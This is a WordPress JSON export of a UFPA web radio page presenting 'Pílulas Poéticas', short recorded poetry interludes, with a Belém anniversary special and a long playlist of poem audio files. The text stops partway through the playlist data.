{"id":8341,"date":"2021-05-25T11:25:15","date_gmt":"2021-05-25T14:25:15","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=8341"},"modified":"2025-10-21T11:33:06","modified_gmt":"2025-10-21T14:33:06","slug":"pilulas-poeticas","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/","title":{"rendered":"P\u00edlulas Po\u00e9ticas"},"content":{"rendered":"<div style=\"background-color: #03a9f4; margin-bottom: 50px; padding: 30px; color: #fff;\" data-darkreader-inline-bgcolor=\"\" data-darkreader-inline-color=\"\">\n<h1>Interprogramas<\/h1>\n<h4 align=\"justify\">A programa\u00e7\u00e3o da R\u00e1dio Web UFPA est\u00e1 repleta de informa\u00e7\u00e3o, cultura e entretenimento para curtir e ouvir em todos os formatos. Ao longo dos intervalos, voc\u00ea confere uma s\u00e9rie de interprogramas produzidos com a marca da webemissora que valoriza a produ\u00e7\u00e3o de conhecimento, a informa\u00e7\u00e3o e a m\u00fasica da melhor qualidade.<\/h4>\n<\/div>\n<div>\n<div>\n<h2><strong><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_miniatura.jpeg?resize=101%2C101&#038;ssl=1\" width=\"101\" height=\"101\" \/><\/strong><\/h2>\n<h2><\/h2>\n<h2><strong>P\u00edlulas Po\u00e9ticas<\/strong><\/h2>\n<p>\u00c9 o espa\u00e7o para poesia, conto e poema, sempre nos intervalos da programa\u00e7\u00e3o. A ideia \u00e9 proporcionar aos webouvintes obras dos grandes e diversos autores da literatura paraense e brasileira. Neste m\u00eas em que Bel\u00e9m comemora 406 anos, confira o P\u00edlulas Po\u00e9ticas especial pelo anivers\u00e1rio da cidade que \u00e9 cantada e contada em verso e prosa, mas que ainda precisa de mais aten\u00e7\u00e3o e cuidados por parte de todos os seus mais de um milh\u00e3o e meio de habitantes! Viva Bel\u00e9m!<\/p>\n<\/div>\n<h3>Especial Anivers\u00e1rio de Bel\u00e9m<\/h3>\n<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/01\/PILULAS-POETICAS-BELEM-DO-PARA-FATIMA-TELES.mp3'>BEL\u00c9M DO PAR\u00c1 - F\u00c1TIMA TELES<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/01\/PILULAS-POETICAS-BELEM-DO-PARA-MANOEL-BANDEIRA.mp3'>BEL\u00c9M DO PAR\u00c1 - MANOEL BANDEIRA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/01\/PILULAS-POETICAS-BELEM-DOS-MEUS-ENCANTOS-SILVIA-HELENA-TOCANTINS.mp3'>BEL\u00c9M DOS MEUS ENCANTOS - SILVIA HELENA TOCANTINS<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/01\/PILULAS-POETICAS-SE-EU-CIDADE-CARLOS-CORREIA-SANTOS.mp3'>SE EU, CIDADE - CARLOS CORREIA SANTOS<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/PILULAS-POETICAS-BELEM-DO-PARA-FATIMA-TELES.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"BEL\\u00c9M DO PAR\\u00c1 - F\\u00c1TIMA TELES\",\"caption\":\"\",\"description\":\"\\\"P\\u00cdLULAS PO\\u00c9TICAS - BEL\\u00c9M DO PAR\\u00c1 (F\\u00c1TIMA TELES)\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:28\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/PILULAS-POETICAS-BELEM-DO-PARA-MANOEL-BANDEIRA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"BEL\\u00c9M DO PAR\\u00c1 - MANOEL BANDEIRA\",\"caption\":\"\",\"description\":\"\\\"P\\u00cdLULAS PO\\u00c9TICAS - BEL\\u00c9M DO PAR\\u00c1 (MANOEL BANDEIRA)\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"2:12\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/PILULAS-POETICAS-BELEM-DOS-MEUS-ENCANTOS-SILVIA-HELENA-TOCANTINS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"BEL\\u00c9M DOS MEUS ENCANTOS - SILVIA HELENA TOCANTINS\",\"caption\":\"\",\"description\":\"\\\"P\\u00cdLULAS PO\\u00c9TICAS - BEL\\u00c9M DOS MEUS ENCANTOS (SILVIA HELENA TOCANTINS)\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"2:01\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/PILULAS-POETICAS-SE-EU-CIDADE-CARLOS-CORREIA-SANTOS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"SE EU, CIDADE - CARLOS CORREIA SANTOS\",\"caption\":\"\",\"description\":\"\\\"P\\u00cdLULAS PO\\u00c9TICAS - SE EU, CIDADE (CARLOS CORREIA SANTOS)\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:30\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n<h3>P\u00edlulas Po\u00e9ticas<\/h3>\n<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-DAS-PEDRAS.mp3'>DAS PEDRAS<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-CENAS-DA-VIDA-BRASILEIRA.mp3'>CENAS DA VIDA BRASILEIRA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-CANSA-ME.mp3'>CANSA-ME<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-CAMINHO-MONOTONO.mp3'>CAMINHO MONOTONO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-AUTO-RETRATO.mp3'>AUTO RETRATO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-ATRASO-PONTUAL.mp3'>ATRASO PONTUAL<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-AMAR-A-MORTE.mp3'>AMAR A MORTE<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-A-VIDA-E-O-TEMPO.mp3'>A VIDA E O TEMPO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-A-HOSPEDE.mp3'>A HOSPEDE<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-SER-MAE-COELHO-NETO.mp3'>SER MAE- COELHO NETO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-REINVENCAO.mp3'>REINVEN\u00c7\u00c3O<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-QUANTO-A-MIM-SONHAREI-COM-PORTUGAL.mp3'>QUANTO A MIM SONHAREI COM PORTUGAL<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-POETICA.mp3'>POETICA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-POEMA-DO-FALSO-AMOR.mp3'>POEMA DO FALSO AMOR<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-POEMA-APRENDIZ.mp3'>POEMA APRENDIZ<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-PERGUNTE-ME.mp3'>PERGUNTE-ME<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-PEQUENA-FABULA.mp3'>PEQUENA FABULA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-PARA-CONTAR-SILENCIOS.mp3'>PARA CONTAR SILENCIOS<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-ORACAO.mp3'>ORA\u00c7\u00c3O<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-POETA-E-UMIMPOSTOR.mp3'>O POETA \u00c9 UMIMPOSTOR<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-PALACIO-DA-AVENTURA.mp3'>O PALACIO DA AVENTURA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-MORCEGO.mp3'>O MORCEGO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-MENINO-QUE-CARREGAVA-AGUA-NO-PANEIRO.mp3'>O MENINO QUE CARREGAVA AGUA NO PANEIRO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-FILHO-DO-SECULO.mp3'>O FILHO DO SECULO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-APANHADOR-DE-DESPERDICIOS.mp3'>O APANHADOR DE DESPERDICIOS<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-AMOR-E-O-OUTRO.mp3'>O AMOR E O OUTRO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-O-ACENDEDOR-DE-LAMPIAO.mp3'>O ACENDEDOR DE LAMPI\u00c3O<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-NOCOES.mp3'>NO\u00c7\u00d5ES<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-NO-CAMINHO-COM-MAYAKOVISK.mp3'>NO CAMINHO COM MAYAKOVISK<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MEU-DESTINO.mp3'>MEU DESTINO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-12..mp3'>MARCIA KAMBEBA - 12.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-11..mp3'>MARCIA KAMBEBA - 11.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-10..mp3'>MARCIA KAMBEBA - 10.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-09..mp3'>MARCIA KAMBEBA - 09.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-08..mp3'>MARCIA KAMBEBA - 08.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-07..mp3'>MARCIA KAMBEBA - 07.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-06..mp3'>MARCIA KAMBEBA - 06.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-05..mp3'>MARCIA KAMBEBA - 05.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-04..mp3'>MARCIA KAMBEBA - 04.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-03..mp3'>MARCIA KAMBEBA - 03.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-02..mp3'>MARCIA KAMBEBA - 02.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-MARCIA-KAMBEBA-01..mp3'>MARCIA KAMBEBA - 01.<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-INTIMIDADE.mp3'>INTIMIDADE<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-GANHOS.mp3'>GANHOS<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-FALA.mp3'>FALA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-EU-OUCO-MUSICA.mp3'>EU OU\u00c7O MUSICA<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-ESTA-PRESA-A-VERDADE.mp3'>EST\u00c1 PRESA A VERDADE<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-ENSINAMENTO.mp3'>ENSINAMENTO<\/a><\/li><li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/PILULAS-POETICAS-DOCE-ENGANO.mp3'>DOCE ENGANO<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-DAS-PEDRAS.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"DAS PEDRAS\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - DAS PEDRAS\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-CENAS-DA-VIDA-BRASILEIRA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"CENAS DA VIDA BRASILEIRA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - CENAS DA VIDA BRASILEIRA\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:49\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-CANSA-ME.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"CANSA-ME\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - CANSA-ME\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:18\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-CAMINHO-MONOTONO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"CAMINHO MONOTONO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - CAMINHO MONOTONO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:18\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-AUTO-RETRATO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"AUTO RETRATO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - AUTO RETRATO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:08\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-ATRASO-PONTUAL.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"ATRASO PONTUAL\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - ATRASO PONTUAL\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:54\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-AMAR-A-MORTE.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"AMAR A MORTE\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - AMAR A MORTE\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:50\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-A-VIDA-E-O-TEMPO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"A VIDA E O TEMPO\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - A VIDA E O TEMPO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:00\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-A-HOSPEDE.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"A HOSPEDE\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - A HOSPEDE\\\".\",\"meta\":{\"length_formatted\":\"1:24\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-SER-MAE-COELHO-NETO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"SER MAE- COELHO NETO\",\"caption\":\"\",\"description\":\"\\\"PILULAS PO\\u00c9TICAS - SER MAE- COELHO NETO\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:49\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-REINVENCAO.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"REINVEN\\u00c7\\u00c3O\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - REINVEN\\u00c7\\u00c3O\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:24\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-QUANTO-A-MIM-SONHAREI-COM-PORTUGAL.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"QUANTO A MIM SONHAREI COM PORTUGAL\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - QUANTO A MIM SONHAREI COM PORTUGAL\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:53\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-POETICA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"POETICA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - POETICA\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"0:42\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-POEMA-DO-FALSO-AMOR.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"POEMA DO FALSO AMOR\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - POEMA DO FALSO AMOR\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:08\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-POEMA-APRENDIZ.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"POEMA APRENDIZ\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - POEMA APRENDIZ\\\".\",\"meta\":{\"length_formatted\":\"1:20\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-PERGUNTE-ME.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"PERGUNTE-ME\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - PERGUNTE-ME\\\". G\\u00eanero: Other.\",\"meta\":{\"genre\":\"Other\",\"length_formatted\":\"1:22\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}},{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2021\\\/05\\\/PILULAS-POETICAS-PEQUENA-FABULA.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"PEQUENA FABULA\",\"caption\":\"\",\"description\":\"\\\"PILULAS POETICAS - PEQUENA FABULA\\\". G\\u00eanero: 